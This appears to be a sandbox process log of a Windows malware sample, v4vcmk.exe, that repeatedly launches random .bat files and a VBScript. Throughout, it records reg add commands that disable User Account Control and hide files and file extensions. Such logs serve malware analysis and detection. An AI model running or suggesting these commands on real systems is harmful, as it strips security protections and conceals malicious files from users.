C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YSUQsYIs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ECAUgUcA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugcockcY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JAAogoMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bqUoEEAs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JqAsYEMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FkEQsoEM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lOwEooUs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NiAMoIMU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qSooMkUB.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GYMwkEgk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yiYccQMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QSAUggIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZQYEsoQE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RawckskI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGccIIwk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEcEAowU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IcMEokIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AwAocssQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vqwoMsgk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bkcoUMIo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rEIUEkMQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gSkkgsIo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cyAoMMgc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HqkwsEss.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TIwIcgYA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bUEsYsII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hqQQUccU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

